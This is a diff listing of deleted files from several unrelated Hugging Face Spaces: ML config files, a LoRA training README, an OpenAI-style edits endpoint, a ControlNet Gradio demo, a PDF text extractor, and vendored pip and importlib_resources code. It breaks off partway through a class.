|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/Andy1621/uniformer_image_segmentation/configs/deeplabv3/deeplabv3_r101-d8_480x480_40k_pascal_context.py
DELETED
@@ -1,2 +0,0 @@
|
|
1 |
-
_base_ = './deeplabv3_r50-d8_480x480_40k_pascal_context.py'
|
2 |
-
model = dict(pretrained='open-mmlab://resnet101_v1c', backbone=dict(depth=101))
|
|
|
|
|
|
spaces/AnishKumbhar/ChatBot/text-generation-webui-main/extensions/Training_PRO/README.md
DELETED
@@ -1,56 +0,0 @@
|
|
1 |
-
# Training_PRO
|
2 |
-
|
3 |
-
This is an expanded Training tab
|
4 |
-
Maintained by FP
|
5 |
-
|
6 |
-
https://github.com/FartyPants/Training_PRO
|
7 |
-
|
8 |
-
- Chunking: precise raw text slicer (PRTS) uses sentence slicing and making sure things are clean on all ends
|
9 |
-
- overlap chunking - this special overlapping will make additional overlap block based on logical rules (aka no overlap block on hard cut)
|
10 |
-
- custom scheduler (follow the code to make your own) In LR Scheduler select FP_low_epoch_annealing - this scheduler will keep the LR constant for first epoch then use cosine for the rest - this part would be best to spawn into a new py file
|
11 |
-
- saves graph png file at the end with learning rate and loss per epoch
|
12 |
-
- adding EOS to each block or to hard cut only
|
13 |
-
- automatically lowers gradient accumulation if you go overboard and set gradient accumulation that will be higher than actual data - transformers would then throw error (or they used to, not sure if still true) but in any way, it will fix bad data
|
14 |
-
- turn BOS on and OFF
|
15 |
-
- target selector
|
16 |
-
- DEMENTOR LEARNING (experimental) Deep Memorization Enforcement Through Overlapping and Repetition. This is an experiment for long-text learning using low epochs (basically use 1 epoch with constant LR or 2 epochs with FP_low_epoch_annealing LR scheduler)
|
17 |
-
- Getting rid of micro batch size/batch size confusion. Now there is True Batch Size and Gradient accumulation slider, consisten with all the other training out there
|
18 |
-
- Ability to save Checkpoint during training with a button
|
19 |
-
- Ability to change Stop Loss during training
|
20 |
-
- different modes of checkpoint auto saving
|
21 |
-
- Function to Check Dataset and suggest parameters such as warmup and checkpoint save frequency before training
|
22 |
-
|
23 |
-
### Notes:
|
24 |
-
|
25 |
-
This uses it's own chunking code for raw text based on sentence splitting. This will avoid weird cuts in the chunks and each chunk should now start with sentence and end on some sentence. It works hand in hand with Hard Cut. A propper use is to structure your text into logical blocks (ideas) separated by three \n then use three \n in hard cut. This way each chunk will contain only one flow of ideas and not derail in the thoughts. And Overlapping code will create overlapped blocks on sentence basis too, but not cross hard cut, thus not cross different ideas either. Does it make any sense? No? Hmmmm...
|
26 |
-
|
27 |
-
### Targets
|
28 |
-
|
29 |
-
Normal LORA is q, v and that's what you should use. You can use (q k v o) or (q k v) and it will give you a lot more trainable parameters. The benefit is that you can keep rank lower and still attain the same coherency as q v with high rank. Guanaco has been trained with QLORA and q k v o for example and they swear by it.
|
30 |
-
|
31 |
-
### DEMENTOR LEARNING (experimental) Deep Memorization Enforcement Through Overlapping and Repetition
|
32 |
-
|
33 |
-
This is and experimental chunking to train long-form text in low number of epochs (basically 1) with sliding repetition. The depth of learning directly depends on the cutoff_length. Increasing cutoff length will also increase number of blocks created from long-form text (which is contrary to normal training). It is based on my own wild experiments.
|
34 |
-
|
35 |
-
### Getting rid of batch size and micro batch size
|
36 |
-
|
37 |
-
Keeping consistency with everyone else.
|
38 |
-
|
39 |
-
Listen, There is only ONE batch size - the True batch size (called previously micro-batch size in WebUI) - this is how many blocks are processed at once (during a single step). It eats GPU, but it really helps with the quality training (in fact the ideal batch size would be the same as number of blocks - which is unrealistic) - so the idea is to cram as much True Batch Size before your GPU blows with OOM. On 24GB this is about 10 for 13b (loaded with 4-bit)
|
40 |
-
|
41 |
-
So no micro batch size - it is now called True Batch Size, because that's what it is.
|
42 |
-
|
43 |
-
The other thing is Gradient Accumulation - this is an emulation of the above Batch size - a virtual batch size, if you will. If your GPU can't handle real batch size then you may fake it using Gradient Accumulation. This will accumulate the gradients over so many steps defined here and then update the weights at the end without increase in GPU.
|
44 |
-
Gradient accumulation is like a virtual Batch size multiplier without the GPU penalty.
|
45 |
-
|
46 |
-
If your batch size is 4 and your gradient accumulation is 2 then it sort of behaves as if we have batch size 8. *Sort of* because Batch size of 4 and GA of 2 is NOT the same as batch size of 2 and GA of 4. (It produces different weights - hence it's not an equivalent). The idea is that if you don't have GPU - using GA to extend batch size is the next best thing (good enough) since you have no other choice.
|
47 |
-
|
48 |
-
If all you can afford is 1 batch size, then increasing GA will likely make the learning better in some range of GA (it's not always more is better).
|
49 |
-
|
50 |
-
However - GA is not some golden goose. As said, it isn't the same as batch size. In fact GA may worsen your learning as well.
|
51 |
-
|
52 |
-
I would suggest a series of experiment where you would put batch size as high as possible without OOM, set GA 1, then repeat training while increasing the GA (2, 4...), and see how the model changes. It's likely that it would follow some sort of curve where GA will seem to help before it will make it worse. Some people believe that if you can squeeze 6 BATCH Size, then you should not bother with GA at all... YMMW
|
53 |
-
|
54 |
-
High Batch Size vs High GA would also likely produce different results in terms of learning words vs style. How? Hmmmm... good question.
|
55 |
-
|
56 |
-
One optical "benefit" of GA is that the loss will fluctuate less (because of all the gradient accumulation, which works as a form of noise smoothing as well).
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/AnishKumbhar/ChatBot/text-generation-webui-main/extensions/openai/edits.py
DELETED
@@ -1,101 +0,0 @@
|
|
1 |
-
import time
|
2 |
-
|
3 |
-
import yaml
|
4 |
-
from extensions.openai.defaults import get_default_req_params
|
5 |
-
from extensions.openai.errors import InvalidRequestError
|
6 |
-
from extensions.openai.utils import debug_msg
|
7 |
-
from modules import shared
|
8 |
-
from modules.text_generation import encode, generate_reply
|
9 |
-
|
10 |
-
|
11 |
-
def edits(instruction: str, input: str, temperature=1.0, top_p=1.0) -> dict:
|
12 |
-
|
13 |
-
created_time = int(time.time() * 1000)
|
14 |
-
|
15 |
-
# Request parameters
|
16 |
-
req_params = get_default_req_params()
|
17 |
-
stopping_strings = []
|
18 |
-
|
19 |
-
# Alpaca is verbose so a good default prompt
|
20 |
-
default_template = (
|
21 |
-
"Below is an instruction that describes a task, paired with an input that provides further context. "
|
22 |
-
"Write a response that appropriately completes the request.\n\n"
|
23 |
-
"### Instruction:\n{instruction}\n\n### Input:\n{input}\n\n### Response:\n"
|
24 |
-
)
|
25 |
-
|
26 |
-
instruction_template = default_template
|
27 |
-
|
28 |
-
# Use the special instruction/input/response template for anything trained like Alpaca
|
29 |
-
if shared.settings['instruction_template']:
|
30 |
-
if 'Alpaca' in shared.settings['instruction_template']:
|
31 |
-
stopping_strings.extend(['\n###'])
|
32 |
-
else:
|
33 |
-
try:
|
34 |
-
instruct = yaml.safe_load(open(f"instruction-templates/{shared.settings['instruction_template']}.yaml", 'r'))
|
35 |
-
|
36 |
-
template = instruct['turn_template']
|
37 |
-
template = template\
|
38 |
-
.replace('<|user|>', instruct.get('user', ''))\
|
39 |
-
.replace('<|bot|>', instruct.get('bot', ''))\
|
40 |
-
.replace('<|user-message|>', '{instruction}\n{input}')
|
41 |
-
|
42 |
-
instruction_template = instruct.get('context', '') + template[:template.find('<|bot-message|>')].rstrip(' ')
|
43 |
-
if instruct['user']:
|
44 |
-
stopping_strings.extend(['\n' + instruct['user'], instruct['user']])
|
45 |
-
|
46 |
-
except Exception as e:
|
47 |
-
instruction_template = default_template
|
48 |
-
print(f"Exception: When loading instruction-templates/{shared.settings['instruction_template']}.yaml: {repr(e)}")
|
49 |
-
print("Warning: Loaded default instruction-following template (Alpaca) for model.")
|
50 |
-
else:
|
51 |
-
stopping_strings.extend(['\n###'])
|
52 |
-
print("Warning: Loaded default instruction-following template (Alpaca) for model.")
|
53 |
-
|
54 |
-
edit_task = instruction_template.format(instruction=instruction, input=input)
|
55 |
-
|
56 |
-
truncation_length = shared.settings['truncation_length']
|
57 |
-
|
58 |
-
token_count = len(encode(edit_task)[0])
|
59 |
-
max_tokens = truncation_length - token_count
|
60 |
-
|
61 |
-
if max_tokens < 1:
|
62 |
-
err_msg = f"This model maximum context length is {truncation_length} tokens. However, your messages resulted in over {truncation_length - max_tokens} tokens."
|
63 |
-
raise InvalidRequestError(err_msg, param='input')
|
64 |
-
|
65 |
-
req_params['max_new_tokens'] = max_tokens
|
66 |
-
req_params['truncation_length'] = truncation_length
|
67 |
-
req_params['temperature'] = temperature
|
68 |
-
req_params['top_p'] = top_p
|
69 |
-
req_params['seed'] = shared.settings.get('seed', req_params['seed'])
|
70 |
-
req_params['add_bos_token'] = shared.settings.get('add_bos_token', req_params['add_bos_token'])
|
71 |
-
req_params['custom_stopping_strings'] = shared.settings['custom_stopping_strings']
|
72 |
-
|
73 |
-
debug_msg({'edit_template': edit_task, 'req_params': req_params, 'token_count': token_count})
|
74 |
-
|
75 |
-
generator = generate_reply(edit_task, req_params, stopping_strings=stopping_strings, is_chat=False)
|
76 |
-
|
77 |
-
answer = ''
|
78 |
-
for a in generator:
|
79 |
-
answer = a
|
80 |
-
|
81 |
-
# some reply's have an extra leading space to fit the instruction template, just clip it off from the reply.
|
82 |
-
if edit_task[-1] != '\n' and answer and answer[0] == ' ':
|
83 |
-
answer = answer[1:]
|
84 |
-
|
85 |
-
completion_token_count = len(encode(answer)[0])
|
86 |
-
|
87 |
-
resp = {
|
88 |
-
"object": "edit",
|
89 |
-
"created": created_time,
|
90 |
-
"choices": [{
|
91 |
-
"text": answer,
|
92 |
-
"index": 0,
|
93 |
-
}],
|
94 |
-
"usage": {
|
95 |
-
"prompt_tokens": token_count,
|
96 |
-
"completion_tokens": completion_token_count,
|
97 |
-
"total_tokens": token_count + completion_token_count
|
98 |
-
}
|
99 |
-
}
|
100 |
-
|
101 |
-
return resp
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/Anonymous-sub/Rerender/ControlNet/annotator/uniformer/mmcv/video/__init__.py
DELETED
@@ -1,11 +0,0 @@
|
|
1 |
-
# Copyright (c) OpenMMLab. All rights reserved.
|
2 |
-
from .io import Cache, VideoReader, frames2video
|
3 |
-
from .optflow import (dequantize_flow, flow_from_bytes, flow_warp, flowread,
|
4 |
-
flowwrite, quantize_flow, sparse_flow_from_bytes)
|
5 |
-
from .processing import concat_video, convert_video, cut_video, resize_video
|
6 |
-
|
7 |
-
__all__ = [
|
8 |
-
'Cache', 'VideoReader', 'frames2video', 'convert_video', 'resize_video',
|
9 |
-
'cut_video', 'concat_video', 'flowread', 'flowwrite', 'quantize_flow',
|
10 |
-
'dequantize_flow', 'flow_warp', 'flow_from_bytes', 'sparse_flow_from_bytes'
|
11 |
-
]
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/Anonymous-sub/Rerender/ControlNet/gradio_normal2image.py
DELETED
@@ -1,99 +0,0 @@
|
|
1 |
-
from share import *
|
2 |
-
import config
|
3 |
-
|
4 |
-
import cv2
|
5 |
-
import einops
|
6 |
-
import gradio as gr
|
7 |
-
import numpy as np
|
8 |
-
import torch
|
9 |
-
import random
|
10 |
-
|
11 |
-
from pytorch_lightning import seed_everything
|
12 |
-
from annotator.util import resize_image, HWC3
|
13 |
-
from annotator.midas import MidasDetector
|
14 |
-
from cldm.model import create_model, load_state_dict
|
15 |
-
from cldm.ddim_hacked import DDIMSampler
|
16 |
-
|
17 |
-
|
18 |
-
apply_midas = MidasDetector()
|
19 |
-
|
20 |
-
model = create_model('./models/cldm_v15.yaml').cpu()
|
21 |
-
model.load_state_dict(load_state_dict('./models/control_sd15_normal.pth', location='cuda'))
|
22 |
-
model = model.cuda()
|
23 |
-
ddim_sampler = DDIMSampler(model)
|
24 |
-
|
25 |
-
|
26 |
-
def process(input_image, prompt, a_prompt, n_prompt, num_samples, image_resolution, detect_resolution, ddim_steps, guess_mode, strength, scale, seed, eta, bg_threshold):
|
27 |
-
with torch.no_grad():
|
28 |
-
input_image = HWC3(input_image)
|
29 |
-
_, detected_map = apply_midas(resize_image(input_image, detect_resolution), bg_th=bg_threshold)
|
30 |
-
detected_map = HWC3(detected_map)
|
31 |
-
img = resize_image(input_image, image_resolution)
|
32 |
-
H, W, C = img.shape
|
33 |
-
|
34 |
-
detected_map = cv2.resize(detected_map, (W, H), interpolation=cv2.INTER_LINEAR)
|
35 |
-
|
36 |
-
control = torch.from_numpy(detected_map[:, :, ::-1].copy()).float().cuda() / 255.0
|
37 |
-
control = torch.stack([control for _ in range(num_samples)], dim=0)
|
38 |
-
control = einops.rearrange(control, 'b h w c -> b c h w').clone()
|
39 |
-
|
40 |
-
if seed == -1:
|
41 |
-
seed = random.randint(0, 65535)
|
42 |
-
seed_everything(seed)
|
43 |
-
|
44 |
-
if config.save_memory:
|
45 |
-
model.low_vram_shift(is_diffusing=False)
|
46 |
-
|
47 |
-
cond = {"c_concat": [control], "c_crossattn": [model.get_learned_conditioning([prompt + ', ' + a_prompt] * num_samples)]}
|
48 |
-
un_cond = {"c_concat": None if guess_mode else [control], "c_crossattn": [model.get_learned_conditioning([n_prompt] * num_samples)]}
|
49 |
-
shape = (4, H // 8, W // 8)
|
50 |
-
|
51 |
-
if config.save_memory:
|
52 |
-
model.low_vram_shift(is_diffusing=True)
|
53 |
-
|
54 |
-
model.control_scales = [strength * (0.825 ** float(12 - i)) for i in range(13)] if guess_mode else ([strength] * 13) # Magic number. IDK why. Perhaps because 0.825**12<0.01 but 0.826**12>0.01
|
55 |
-
samples, intermediates = ddim_sampler.sample(ddim_steps, num_samples,
|
56 |
-
shape, cond, verbose=False, eta=eta,
|
57 |
-
unconditional_guidance_scale=scale,
|
58 |
-
unconditional_conditioning=un_cond)
|
59 |
-
|
60 |
-
if config.save_memory:
|
61 |
-
model.low_vram_shift(is_diffusing=False)
|
62 |
-
|
63 |
-
x_samples = model.decode_first_stage(samples)
|
64 |
-
x_samples = (einops.rearrange(x_samples, 'b c h w -> b h w c') * 127.5 + 127.5).cpu().numpy().clip(0, 255).astype(np.uint8)
|
65 |
-
|
66 |
-
results = [x_samples[i] for i in range(num_samples)]
|
67 |
-
return [detected_map] + results
|
68 |
-
|
69 |
-
|
70 |
-
block = gr.Blocks().queue()
|
71 |
-
with block:
|
72 |
-
with gr.Row():
|
73 |
-
gr.Markdown("## Control Stable Diffusion with Normal Maps")
|
74 |
-
with gr.Row():
|
75 |
-
with gr.Column():
|
76 |
-
input_image = gr.Image(source='upload', type="numpy")
|
77 |
-
prompt = gr.Textbox(label="Prompt")
|
78 |
-
run_button = gr.Button(label="Run")
|
79 |
-
with gr.Accordion("Advanced options", open=False):
|
80 |
-
num_samples = gr.Slider(label="Images", minimum=1, maximum=12, value=1, step=1)
|
81 |
-
image_resolution = gr.Slider(label="Image Resolution", minimum=256, maximum=768, value=512, step=64)
|
82 |
-
strength = gr.Slider(label="Control Strength", minimum=0.0, maximum=2.0, value=1.0, step=0.01)
|
83 |
-
guess_mode = gr.Checkbox(label='Guess Mode', value=False)
|
84 |
-
detect_resolution = gr.Slider(label="Normal Resolution", minimum=128, maximum=1024, value=384, step=1)
|
85 |
-
bg_threshold = gr.Slider(label="Normal background threshold", minimum=0.0, maximum=1.0, value=0.4, step=0.01)
|
86 |
-
ddim_steps = gr.Slider(label="Steps", minimum=1, maximum=100, value=20, step=1)
|
87 |
-
scale = gr.Slider(label="Guidance Scale", minimum=0.1, maximum=30.0, value=9.0, step=0.1)
|
88 |
-
seed = gr.Slider(label="Seed", minimum=-1, maximum=2147483647, step=1, randomize=True)
|
89 |
-
eta = gr.Number(label="eta (DDIM)", value=0.0)
|
90 |
-
a_prompt = gr.Textbox(label="Added Prompt", value='best quality, extremely detailed')
|
91 |
-
n_prompt = gr.Textbox(label="Negative Prompt",
|
92 |
-
value='longbody, lowres, bad anatomy, bad hands, missing fingers, extra digit, fewer digits, cropped, worst quality, low quality')
|
93 |
-
with gr.Column():
|
94 |
-
result_gallery = gr.Gallery(label='Output', show_label=False, elem_id="gallery").style(grid=2, height='auto')
|
95 |
-
ips = [input_image, prompt, a_prompt, n_prompt, num_samples, image_resolution, detect_resolution, ddim_steps, guess_mode, strength, scale, seed, eta, bg_threshold]
|
96 |
-
run_button.click(fn=process, inputs=ips, outputs=[result_gallery])
|
97 |
-
|
98 |
-
|
99 |
-
block.launch(server_name='0.0.0.0')
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/Archan/ArXivAudio/get_pages.py
DELETED
@@ -1,21 +0,0 @@
|
|
1 |
-
from pdfminer.high_level import extract_text, extract_pages
|
2 |
-
from pdfminer.layout import LTTextContainer
|
3 |
-
from preprocess import pre_process
|
4 |
-
|
5 |
-
|
6 |
-
def get_pages(filename, start_page=0, end_page=0):
|
7 |
-
page_number = []
|
8 |
-
for i in range(start_page, end_page+1):
|
9 |
-
page_number.append(i-1)
|
10 |
-
print(page_number)
|
11 |
-
#filename = str(paper.title)+'.pdf'
|
12 |
-
pages = extract_pages(filename, page_numbers=page_number)
|
13 |
-
|
14 |
-
content = ""
|
15 |
-
for page_layout in pages:
|
16 |
-
for element in page_layout:
|
17 |
-
if isinstance(element, LTTextContainer):
|
18 |
-
content = content+element.get_text()
|
19 |
-
content = pre_process(content)
|
20 |
-
|
21 |
-
return content
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pip/_internal/resolution/resolvelib/reporter.py
DELETED
@@ -1,80 +0,0 @@
|
|
1 |
-
from collections import defaultdict
|
2 |
-
from logging import getLogger
|
3 |
-
from typing import Any, DefaultDict
|
4 |
-
|
5 |
-
from pip._vendor.resolvelib.reporters import BaseReporter
|
6 |
-
|
7 |
-
from .base import Candidate, Requirement
|
8 |
-
|
9 |
-
logger = getLogger(__name__)
|
10 |
-
|
11 |
-
|
12 |
-
class PipReporter(BaseReporter):
|
13 |
-
def __init__(self) -> None:
|
14 |
-
self.reject_count_by_package: DefaultDict[str, int] = defaultdict(int)
|
15 |
-
|
16 |
-
self._messages_at_reject_count = {
|
17 |
-
1: (
|
18 |
-
"pip is looking at multiple versions of {package_name} to "
|
19 |
-
"determine which version is compatible with other "
|
20 |
-
"requirements. This could take a while."
|
21 |
-
),
|
22 |
-
8: (
|
23 |
-
"pip is looking at multiple versions of {package_name} to "
|
24 |
-
"determine which version is compatible with other "
|
25 |
-
"requirements. This could take a while."
|
26 |
-
),
|
27 |
-
13: (
|
28 |
-
"This is taking longer than usual. You might need to provide "
|
29 |
-
"the dependency resolver with stricter constraints to reduce "
|
30 |
-
"runtime. See https://pip.pypa.io/warnings/backtracking for "
|
31 |
-
"guidance. If you want to abort this run, press Ctrl + C."
|
32 |
-
),
|
33 |
-
}
|
34 |
-
|
35 |
-
def rejecting_candidate(self, criterion: Any, candidate: Candidate) -> None:
|
36 |
-
self.reject_count_by_package[candidate.name] += 1
|
37 |
-
|
38 |
-
count = self.reject_count_by_package[candidate.name]
|
39 |
-
if count not in self._messages_at_reject_count:
|
40 |
-
return
|
41 |
-
|
42 |
-
message = self._messages_at_reject_count[count]
|
43 |
-
logger.info("INFO: %s", message.format(package_name=candidate.name))
|
44 |
-
|
45 |
-
msg = "Will try a different candidate, due to conflict:"
|
46 |
-
for req_info in criterion.information:
|
47 |
-
req, parent = req_info.requirement, req_info.parent
|
48 |
-
# Inspired by Factory.get_installation_error
|
49 |
-
msg += "\n "
|
50 |
-
if parent:
|
51 |
-
msg += f"{parent.name} {parent.version} depends on "
|
52 |
-
else:
|
53 |
-
msg += "The user requested "
|
54 |
-
msg += req.format_for_error()
|
55 |
-
logger.debug(msg)
|
56 |
-
|
57 |
-
|
58 |
-
class PipDebuggingReporter(BaseReporter):
|
59 |
-
"""A reporter that does an info log for every event it sees."""
|
60 |
-
|
61 |
-
def starting(self) -> None:
|
62 |
-
logger.info("Reporter.starting()")
|
63 |
-
|
64 |
-
def starting_round(self, index: int) -> None:
|
65 |
-
logger.info("Reporter.starting_round(%r)", index)
|
66 |
-
|
67 |
-
def ending_round(self, index: int, state: Any) -> None:
|
68 |
-
logger.info("Reporter.ending_round(%r, state)", index)
|
69 |
-
|
70 |
-
def ending(self, state: Any) -> None:
|
71 |
-
logger.info("Reporter.ending(%r)", state)
|
72 |
-
|
73 |
-
def adding_requirement(self, requirement: Requirement, parent: Candidate) -> None:
|
74 |
-
logger.info("Reporter.adding_requirement(%r, %r)", requirement, parent)
|
75 |
-
|
76 |
-
def rejecting_candidate(self, criterion: Any, candidate: Candidate) -> None:
|
77 |
-
logger.info("Reporter.rejecting_candidate(%r, %r)", criterion, candidate)
|
78 |
-
|
79 |
-
def pinning(self, candidate: Candidate) -> None:
|
80 |
-
logger.info("Reporter.pinning(%r)", candidate)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pkg_resources/_vendor/importlib_resources/_adapters.py
DELETED
@@ -1,170 +0,0 @@
|
|
1 |
-
from contextlib import suppress
|
2 |
-
from io import TextIOWrapper
|
3 |
-
|
4 |
-
from . import abc
|
5 |
-
|
6 |
-
|
7 |
-
class SpecLoaderAdapter:
|
8 |
-
"""
|
9 |
-
Adapt a package spec to adapt the underlying loader.
|
10 |
-
"""
|
11 |
-
|
12 |
-
def __init__(self, spec, adapter=lambda spec: spec.loader):
|
13 |
-
self.spec = spec
|
14 |
-
self.loader = adapter(spec)
|
15 |
-
|
16 |
-
def __getattr__(self, name):
|
17 |
-
return getattr(self.spec, name)
|
18 |
-
|
19 |
-
|
20 |
-
class TraversableResourcesLoader:
|
21 |
-
"""
|
22 |
-
Adapt a loader to provide TraversableResources.
|
23 |
-
"""
|
24 |
-
|
25 |
-
def __init__(self, spec):
|
26 |
-
self.spec = spec
|
27 |
-
|
28 |
-
def get_resource_reader(self, name):
|
29 |
-
return CompatibilityFiles(self.spec)._native()
|
30 |
-
|
31 |
-
|
32 |
-
def _io_wrapper(file, mode='r', *args, **kwargs):
|
33 |
-
if mode == 'r':
|
34 |
-
return TextIOWrapper(file, *args, **kwargs)
|
35 |
-
elif mode == 'rb':
|
36 |
-
return file
|
37 |
-
raise ValueError(
|
38 |
-
"Invalid mode value '{}', only 'r' and 'rb' are supported".format(mode)
|
39 |
-
)
|
40 |
-
|
41 |
-
|
42 |
-
class CompatibilityFiles:
|
43 |
-
"""
|
44 |
-
Adapter for an existing or non-existent resource reader
|
45 |
-
to provide a compatibility .files().
|
46 |
-
"""
|
47 |
-
|
48 |
-
class SpecPath(abc.Traversable):
|
49 |
-
"""
|
50 |
-
Path tied to a module spec.
|
51 |
-
Can be read and exposes the resource reader children.
|
52 |
-
"""
|
53 |
-
|
54 |
-
def __init__(self, spec, reader):
|
55 |
-
self._spec = spec
|
56 |
-
self._reader = reader
|
57 |
-
|
58 |
-
def iterdir(self):
|
59 |
-
if not self._reader:
|
60 |
-
return iter(())
|
61 |
-
return iter(
|
62 |
-
CompatibilityFiles.ChildPath(self._reader, path)
|
63 |
-
for path in self._reader.contents()
|
64 |
-
)
|
65 |
-
|
66 |
-
def is_file(self):
|
